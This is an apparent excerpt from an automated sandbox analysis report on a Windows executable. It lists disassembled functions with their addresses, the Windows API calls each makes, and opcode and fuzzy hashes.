Opcode ID: 87b83290662297e5c2129baa50ca266b02a142d2f175bee5a0958314259d1dcd
Instruction ID: 44770a883b2ee908e5b1a641103b6121dd374424687f2bae270a68270e49d062
Opcode Fuzzy Hash: 87b83290662297e5c2129baa50ca266b02a142d2f175bee5a0958314259d1dcd
Instruction Fuzzy Hash: 6B41D722F1465298FB00FBB5D4416EDA360AF44BE8FA41235DE5D27AC9DEF8D442D310

Function 00007FF731C82738 Relevance: 3.1, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF731C8270D), ref: 00007FF731C82869
GetLastError.KERNEL32(?,00007FF731C8270D), ref: 00007FF731C82878

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 15a0c32312994542f24a0a355b1d122a2bfdb3c55d25b91561185cfc545188a1
Instruction ID: 4bccf124bebe4e6d537dd6fca13268c51b0431382a55e8a20c8a77bcd32ebb76
Opcode Fuzzy Hash: 15a0c32312994542f24a0a355b1d122a2bfdb3c55d25b91561185cfc545188a1
Instruction Fuzzy Hash: 9831E732F19942A2EF607B2AD5846B5A350AF08FD4FA55131EE1C47F90DFBCD541E620

Function 00007FF731C722BC Relevance: 3.1, APIs: 2, Instructions: 83COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00007FF731C722F1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C723F0

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: Item_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1746051919-0
Opcode ID: 71f64fde1668b052c0320d8937d0d2131f92a6a8039284af6fd262a6b65af6e7
Instruction ID: c129ec924e9e8c47fc2b36cc8b9be8c2f38c1975fad2eb823153d128fcada05f
Opcode Fuzzy Hash: 71f64fde1668b052c0320d8937d0d2131f92a6a8039284af6fd262a6b65af6e7
Instruction Fuzzy Hash: DC31C622E1878266EB14AB15E44536EF360FB84B90FA44235EB9C07BD5DFBCE540D710

Function 00007FF731C82A90 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32 ref: 00007FF731C82ABE
SetFileTime.KERNELBASE ref: 00007FF731C82B5B

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: e2360d92fa371ec3cf3789b724fac7dc0eee746b57302bb10420cb3d80e8e918
Instruction ID: 795f293d571d347ddc5a992d4d76d28fbc281ca953abedd00703262b1a48f4e9
Opcode Fuzzy Hash: e2360d92fa371ec3cf3789b724fac7dc0eee746b57302bb10420cb3d80e8e918
Instruction Fuzzy Hash: CE21F922E0D75271EB71AA51D4853B6E790EF09B94FA54031DE4C06A91EEBCD486D310

Function 00007FF731C82B70 Relevance: 3.0, APIs: 2, Instructions: 47COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE ref: 00007FF731C82BD1
GetLastError.KERNEL32 ref: 00007FF731C82BDE

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: b516d334dd1c85efa09aca89d3d43d2e2cc6a6d2d54fdbc8055284d5c2cf1125
Instruction ID: dfaf182556d51e55246606ad8068755d669f5e8b2b4bbbea3128221acf3ce441
Opcode Fuzzy Hash: b516d334dd1c85efa09aca89d3d43d2e2cc6a6d2d54fdbc8055284d5c2cf1125
Instruction Fuzzy Hash: 4B11B421E1D641A1FB60AB25E485279B360FB48BB4FA44331DA3E52AD4CFBCD492E310

Function 00007FF731C7255C Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF731C8A46C: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF731C8A4C4
Part of subcall function 00007FF731C8A46C: SetDlgItemTextW.USER32 ref: 00007FF731C8A533
Part of subcall function 00007FF731C8A46C: GetWindowRect.USER32 ref: 00007FF731C8A56D
Part of subcall function 00007FF731C8A46C: GetClientRect.USER32 ref: 00007FF731C8A57B

GetDlgItem.USER32 ref: 00007FF731C725AC
SetWindowTextW.USER32 ref: 00007FF731C725C8

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: ItemRectTextWindow$Clientswprintf
String ID:
API String ID: 3322643685-0
Opcode ID: b1e1e049dd5e2ad137b0382b0bc9e4d843d915bd339b20a0dba0486b348c3455
Instruction ID: 5702a59921c800379d4c7962256e110e62992302e4d804a304a6878b68a78832
Opcode Fuzzy Hash: b1e1e049dd5e2ad137b0382b0bc9e4d843d915bd339b20a0dba0486b348c3455
Instruction Fuzzy Hash: 8E018421E0D38A65FF997752A499279D391AF89744FE85034CC0E066DDDEECE884E320

Function 00007FF731C8EAD4 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,00007FF731C8EB29,?,?,?,?,00007FF731C85712,?,?,?,00007FF731C8569E), ref: 00007FF731C8EAD8
GetProcessAffinityMask.KERNEL32 ref: 00007FF731C8EAEB

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 79722ee71258bf1dae4358653295d549d31541bd73e3f7913cc80f15ba5fc09c
Instruction ID: 9c1c82b2fb8eae551d33ee27cbcb6f7f5ffa551d26707b094d27e16744331e83
Opcode Fuzzy Hash: 79722ee71258bf1dae4358653295d549d31541bd73e3f7913cc80f15ba5fc09c
Instruction Fuzzy Hash: 94E02B61F1458692DF08DF55D8414E9F391FFC8B40BD48036D50B83A14DE2CE1598B10

Function 00007FF731CA2150 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF731CA2180

Part of subcall function 00007FF731CA2EFC: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF731CA2F05

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF731CA2186

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
String ID:
API String ID: 1173176844-0
Opcode ID: 28e295908e45cc945cfa96d93c8ce30b5be855f4bd91cbefe518a9fba242814a
Instruction ID: 0f8cc569cd9bb002bc7fb2b77eff446482e6470de13f5280a1970b717b39a4d0
Opcode Fuzzy Hash: 28e295908e45cc945cfa96d93c8ce30b5be855f4bd91cbefe518a9fba242814a
Instruction Fuzzy Hash: 02E0B654E1911B65FB2A32A218651B982504F5C7B0EF82F30DB3D086C6ED9CB8A2A130

Function 00007FF731CAD88C Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL ref: 00007FF731CAD8A2
GetLastError.KERNEL32 ref: 00007FF731CAD8B4

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: d6a2b49c909fc4b479ef785cefb012946a1a1cb3df5903558656f65a622c367e
Instruction ID: ad06e4302be49dace17a49ee1ee6ccabf600493a2567bc3f6f04c578ccd66ebc
Opcode Fuzzy Hash: d6a2b49c909fc4b479ef785cefb012946a1a1cb3df5903558656f65a622c367e
Instruction Fuzzy Hash: ABE08650E0D503A2FF05BBF26C240B4D3905F54B40FA84834D90D87251EEBC94816620

Function 00007FF731C733E4 Relevance: 1.8, APIs: 1, Instructions: 328COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7388C

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 76092fec9ee0072f7de08517d0fc1e03b20ff4b8fddd779b1898f3f2b82d375e
Instruction ID: 42522e50e44f71117948c61620f77046378e3d503358724dc3666506afb6ebbc
Opcode Fuzzy Hash: 76092fec9ee0072f7de08517d0fc1e03b20ff4b8fddd779b1898f3f2b82d375e
Instruction Fuzzy Hash: 18D1DB72F0868269EB68EB2596442BCE7A1FB05BC4FA45035CB5D477A5CFBCE460D320

Function 00007FF731C85254 Relevance: 1.7, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C854DB

Part of subcall function 00007FF731C91374: CompareStringW.KERNEL32 ref: 00007FF731C913DA

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: CompareString_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1017591355-0
Opcode ID: a9299d2a3130dccdd2b512c98cf76da81dd81bba2a2d1ba96f3ce2257837a3a3
Instruction ID: f9d9db21d2afed036cfa1b42e14957ef0ac7fc6c2666b8345ef64fd36d327079
Opcode Fuzzy Hash: a9299d2a3130dccdd2b512c98cf76da81dd81bba2a2d1ba96f3ce2257837a3a3
Instruction Fuzzy Hash: 2861F051F0C64761FB60BA29848527AE391AF81BD1FF44131EE4D06ED7EEECE441A231

Function 00007FF731C917F0 Relevance: 1.7, APIs: 1, Instructions: 172COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF731C8E8C4: ReleaseSemaphore.KERNEL32 ref: 00007FF731C8E8F0
Part of subcall function 00007FF731C8E8C4: CloseHandle.KERNELBASE ref: 00007FF731C8E90F
Part of subcall function 00007FF731C8E8C4: DeleteCriticalSection.KERNEL32 ref: 00007FF731C8E926
Part of subcall function 00007FF731C8E8C4: CloseHandle.KERNEL32 ref: 00007FF731C8E933

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C91A4B

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: CloseHandle$CriticalDeleteReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 904680172-0
Opcode ID: 17640105069ed2f0608eed1f021e5c9760774f5960a794fd50d6d3870de83f0d
Instruction ID: 9fd09fe513ed8b863bf3a0a66926f587fcfa796987ae52998beea395902aa5cf
Opcode Fuzzy Hash: 17640105069ed2f0608eed1f021e5c9760774f5960a794fd50d6d3870de83f0d
Instruction Fuzzy Hash: 4E619062F15681B2EF08EB65D5950BCB365FB41F90BA44532D72D07AC2DFACE8719310

Function 00007FF731C7ECAC Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7EEC8

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: c57d8a0ec555fcee93534326d5ed40e5c5fc4c24212281de1439aedd617024c1
Instruction ID: 27d2d39dc9f0061102400b8d3703911d7f11f30497580e16ff17f60ed5a49272
Opcode Fuzzy Hash: c57d8a0ec555fcee93534326d5ed40e5c5fc4c24212281de1439aedd617024c1
Instruction Fuzzy Hash: 0251D463E0864264EB10AB25E8443B9A751FB86BC4FA40536EE4D07792CEFDE491D320

Function 00007FF731C7E7B8 Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF731C83E88: FindClose.KERNELBASE(?,?,00000000,00007FF731C90791), ref: 00007FF731C83EBD

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7E9A3

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: CloseFind_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1011579015-0
Opcode ID: 7e6327150e3ce0c451cb400d7a8f449b7137c37f6cfba28a80f2350899245dea
Instruction ID: 8b9666e6d21646d7f0d1ef86327feeec0afc5858df989ae24c8d637016bee3cc
Opcode Fuzzy Hash: 7e6327150e3ce0c451cb400d7a8f449b7137c37f6cfba28a80f2350899245dea
Instruction Fuzzy Hash: 2D518023E08682A5FB60EF29D4853BDA361FF84BD4FA40135DA8C476A5CFACE451D720

Function 00007FF731C8174C Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C81835

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 09a90ddaa16f23f76c014c9d84ad6b71e5b545690d4943b9b055974de98fba14
Instruction ID: dec4d5632120f98208ca45bf8ad2b394f97820af97f3aebd990d23237a078dab
Opcode Fuzzy Hash: 09a90ddaa16f23f76c014c9d84ad6b71e5b545690d4943b9b055974de98fba14
Instruction Fuzzy Hash: C541F562F18A9162EB14AA13A985379E391FB44FC0FA48435EF4D07F8ADFBCD4518300

Function 00007FF731C82F18 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C83088

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: caeadaeb6b21dbd6819f5fdccb928094d199ec49b01aae4469461aad9123a8f3
Instruction ID: d7cf2325cdbaa1b17d5ef4e4b9c6480042b7ebeea6275ae2a7939c6f4fb87b6a
Opcode Fuzzy Hash: caeadaeb6b21dbd6819f5fdccb928094d199ec49b01aae4469461aad9123a8f3
Instruction Fuzzy Hash: B4411622E0871291EF14AB28D18537DA3A1EB48FD8FA42134EA4D07B99DFBCE441D760

Function 00007FF731CABD78 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF731CABDA0

Part of subcall function 00007FF731CABF30: GetModuleHandleExW.KERNEL32 ref: 00007FF731CABF50
Part of subcall function 00007FF731CABF30: GetProcAddress.KERNEL32 ref: 00007FF731CABF66
Part of subcall function 00007FF731CABF30: FreeLibrary.KERNEL32 ref: 00007FF731CABF8B

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 2a2f1167b8a5567a1982a90cfda6841d20d3bae0c3aade27efee51deb8b54578
Instruction ID: a004bed7cc6c30c5d922c411f29a8452232faa8ebd5c052872614f6395bb9db3
Opcode Fuzzy Hash: 2a2f1167b8a5567a1982a90cfda6841d20d3bae0c3aade27efee51deb8b54578
Instruction Fuzzy Hash: 7A41B321E28603A2FB15FB159850378A761BF50B40FF44836DA0D576E5CEBDEC41E7A1

Function 00007FF731C7129C Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF731C71396

Part of subcall function 00007FF731C71F80: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF731C71F89

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
String ID:
API String ID: 680105476-0
Opcode ID: ba0e9ec32f9d425c922e86707f850c9359ff9466c7c00b2dd6f3e6a55f5680d3
Instruction ID: d9538671f1b4fda8584a8f5815d40041f2966f9b8dba3412c2cb6357a1c09b5d
